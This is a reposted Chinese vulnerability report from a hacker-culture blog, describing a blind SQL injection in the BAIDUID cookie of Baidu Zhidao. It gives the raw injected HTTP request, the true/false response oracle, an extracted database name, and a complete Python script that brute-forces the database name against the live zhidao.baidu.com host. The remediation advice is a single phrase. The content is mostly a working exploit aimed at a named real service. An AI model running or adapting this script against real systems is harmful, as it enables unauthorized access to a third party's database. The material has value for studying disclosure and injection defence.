记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

百度知道一处MySQL注射(附验证脚本)

2015-02-04 20:16

注入点:

code 区域
GET /liuyan/detail HTTP/1.1

Cookie: BAIDUID=-1'%20OR%20ascii(mid(database(),1,1))!=1%20AND%201=1%20--%20

X-Requested-With: XMLHttpRequest

Referer: http://zhidao.baidu.com

Host: zhidao.baidu.com

Connection: Keep-alive

Accept-Encoding: gzip,deflate

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36

Accept: */*



Cookie中BAIDUID可注入。

漏洞证明:

表达式为True时,页面返回302;为false,返回200.

示例猜解database(),得到:

code 区域
iknow_liuyan



baidu_mysqli_8.png





验证脚本:

code 区域
import httplib

import time

import string

import sys

import random

import urllib



headers = {

'Cookie': '',

'User-Agent': 'Mozilla/5.0 (Linux; U; Android 2.3.6; en-us; Nexus S Build/GRK39F) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1',

}



payloads = list('abcdefghijklmnopqrstuvwxyz0123456789@_.')



print 'Try to retrive database():'

user = ''

for i in range(1, 13):

for payload in payloads:

conn = httplib.HTTPConnection('zhidao.baidu.com', timeout=60)

random.seed()

s = str(random.random()) + "' OR ascii(mid(database(),%s,1))=%s AND 1=1 -- " % (i, ord(payload))

headers['Cookie'] = 'BAIDUID=' + urllib.quote(s)

conn.request(method='GET', url= '/liuyan/detail', headers = headers)

resp = conn.getresponse()

html_doc = resp.read()

if resp.status == 302:

user += payload

print '\n[In Progress]', user

break

else:

print '.',

conn.close()





print '\n[Done], current db is', user

修复方案:

过滤,转义

知识来源: www.wooyun.org/bugs/wooyun-2015-088037

阅读:85133 | 评论:0 | 标签:无

想收藏或者和大家分享这篇好文章→复制链接地址

“百度知道一处MySQL注射(附验证脚本)”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

九层之台,起于累土;黑客之术,始于阅读

推广

工具

标签云